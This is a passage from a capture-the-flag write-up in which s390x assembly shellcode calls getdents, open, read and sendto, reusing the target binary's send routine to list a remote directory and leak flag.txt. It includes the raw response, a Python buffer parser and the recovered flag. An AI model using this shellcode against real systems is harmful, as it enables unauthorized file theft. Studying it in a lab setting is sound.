    lhi     %r3, 0
    lhi     %r4, 0
    svc     0

    /* getdents */
    lhi     %r1, 141
    lgr     %r3,%r11
    afi     %r3, 4096
    lghi    %r4, 4096
    svc     0

    /* sendto */
    lgr     %r4,%r2
    lgr     %r2,%r10
    lgr     %r3,%r11
    afi     %r3, 4096
    lghi    %r5,0
    larl    %r6, addr
    /* %r12 = hash table (0x80000d7c); minus 1272 gives 0x80000884,
       the send routine called by the main loop */
    afi     %r12, -1272
    lghi    %r1,16
    stg     %r1,160(%r15)
    balr    %r14, %r12
addr:   .quad 0x02____-------
dir:    .string "."
```

Response:

```
\x00\x00\x00\x00\x00\x00\x00\x11\x0fe\x95\xe2\xb6>!I\x00 nohup.out\x00\x00
\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x12\x1c\t^\r\x82\x91T\xe0\x00\x18
zpwn\x00\x08\x00\x00\x00\x00\x00\x00\x00\x0c2z)5\x13T\xc6\x17\x00\x18.\x00
\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x13?F\xf4bC\\\xcf\xda\x00(
.bash_history\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00
\x00\rB\xf6H\x1f\x00 \xb1\xb4\x00 .bash_logout\x00\x08\x00\x00\x00\x00\x00
\x00\x00\x0fN_\x88r\x1b\xbc\x90L\x00 .bashrc\x00\x00\x00\x00\x00\x00\x08
\x00\x00\x00\x00\x00\x00\x00\x02OpO/F\x88\x8f\x00\x00\x18..\x00\x00\x00
\x04\x00\x00\x00\x00\x00\x00\x00\x0eY{P\xb5\xc3\xe0\x02\xf0\x00 .profile
\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x16m\x9cn\xc56.\x9a\x91
\x00 watchdog.sh\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x7f\xff\xff\xff
\xff\xff\xff\xff\x00 flag.txt\x00\x00\x00\x00\x00\x08
```

Thanks to getdents's buffer, we can then see that a file flag.txt exists in the current directory.
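Rather than reading the raw bytes, the buffer can be decoded with a short parser. The sketch assumes the classic linux_dirent layout on a 64-bit big-endian target: an 8-byte inode, an 8-byte offset, a 2-byte record length, the NUL-terminated name, and the entry type stored in the last byte of the record. The function name `parse_dirents` is ours.

```python
import struct

HEADER = ">QQH"                      # d_ino, d_off, d_reclen (big-endian)
HEADER_SIZE = struct.calcsize(HEADER)


def parse_dirents(buf):
    """Return a list of (inode, type, name) from a raw getdents buffer."""
    buf = bytearray(buf)
    entries = []
    pos = 0
    while pos + HEADER_SIZE <= len(buf):
        d_ino, _d_off, d_reclen = struct.unpack_from(HEADER, buf, pos)
        # Stop on a truncated or malformed record instead of looping forever.
        if d_reclen <= HEADER_SIZE or pos + d_reclen > len(buf):
            break
        raw_name = bytes(buf[pos + HEADER_SIZE:pos + d_reclen - 1])
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", "replace")
        d_type = buf[pos + d_reclen - 1]   # 4 = directory, 8 = regular file
        entries.append((d_ino, d_type, name))
        pos += d_reclen
    return entries


if __name__ == "__main__":
    # First record of the response above.
    sample = (b"\x00\x00\x00\x00\x00\x00\x00\x11\x0fe\x95\xe2\xb6>!I"
              b"\x00 nohup.out\x00\x00\x00\x00\x08")
    print(parse_dirents(sample))
```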

Let's try to open flag.txt and read its contents:

```
    .long 0x00000000
    .long 0xf0000000
exploit:
    /* open */
    lhi     %r1, 5
    larl    %r2, flag
    lhi     %r3, 0
    lhi     %r4, 0
    svc     0

    /* read */
    lhi     %r1, 3
    lgr     %r3,%r11
    afi     %r3, 4096
    lhi     %r4, 4096
    svc     0

    /* sendto */
    lgr     %r4,%r2
    lgr     %r2,%r10
    lgr     %r3,%r11
    afi     %r3, 4096
    lghi    %r5,0
    larl    %r6, addr
    /* %r12 = hash table (0x80000d7c); minus 1272 gives 0x80000884,
       the send routine called by the main loop */
    afi     %r12, -1272
    lghi    %r1,16
    stg     %r1,160(%r15)
    balr    %r14, %r12
addr:   .quad 0x02____-------
flag:   .string "./flag.txt"
```

And it worked, giving us the flag: CTF{684eed23a11fd416bb56b809d491eef4}